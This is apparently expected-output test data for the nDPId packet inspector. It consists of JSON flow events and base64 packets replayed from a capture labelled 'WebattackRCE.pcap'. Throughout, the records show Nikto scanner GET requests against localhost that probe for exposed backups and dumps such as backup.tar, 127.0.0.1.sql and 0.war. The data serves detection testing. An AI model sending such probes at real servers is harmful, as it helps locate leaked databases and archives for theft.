Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277274,"pkt":"AAAAAAAAAAAAAAAACABFAADAlOZAAEAGp09\/AAABfwAAAcR8H5CKg6xDWKPSxIAYAED+tAAAAQEICp1m\/UKdZv1CR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277276,"pkt":"AAAAAAAAAAAAAAAACABFAAC9in1AAEAGsbt\/AAABfwAAAcR+H5AyA7LdjyrNp4AYAED+sQAAAQEICp1m\/USdZv1DR0VUIC8wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277277,"pkt":"AAAAAAAAAAAAAAAACABFAAC906lAAEAGaI9\/AAABfwAAAcSAH5AxZOsBFr\/0GYAYAED+sQAAAQEICp1m\/UWdZv1FR0VUIC8wLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277278,"pkt":"AAAAAAAAAAAAAAAACABFAADCR05AAEAG9OV\/AAABfwAAAcSCH5Cv93\/sjlpOBIAYAED+tgAAAQEICp1m\/UadZv1GR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277279,"pkt":"AAAAAAAAAAAAAAAACABFAADCyNdAAEAGc1x\/AAABfwAAAcSEH5CsG\/B+ct073oAYAED+tgAAAQEICp1m\/UedZv1HR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277281,"pkt":"AAAAAAAAAAAAAAAACABFAADFYHdAAEAG27l\/AAABfwAAAcSGH5C8uFjeIpIdX4AYAED+uQAAAQEICp1m\/UidZv1IR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277282,"pkt":"AAAAAAAAAAAAAAAACABFAADFoI1AAEAGm6N\/AAABfwAAAcSIH5D0M5gk0yESEIAYAED+uQAAAQEICp1m\/UqdZv1KR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277283,"pkt":"AAAAAAAAAAAAAAAACABFAADDBOlAAEAGN0p\/AAABfwAAAcSKH5Dv6jxQN18efIAYAED+twAAAQEICp1m\/UudZv1LR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277284,"pkt":"AAAAAAAAAAAAAAAACABFAADDCzNAAEAGMQB\/AAABfwAAAcSMH5CEzzOZEWOd+IAYAED+twAAAQEICp1m\/UydZv1MR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277284,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277286,"pkt":"AAAAAAAAAAAAAAAACABFAAC9CzBAAEAGMQl\/AAABfwAAAcSOH5AKIDOIyoTTQIAYAED+sQAAAQEICp1m\/U2dZv1NR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277286,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277288,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277288,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JlVAAEAGFeR\/AAABfwAAAcSQH5Clfx76D\/AiGIAYAED+sQAAAQEICp1m\/VCdZv1QR0VUIC8xLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
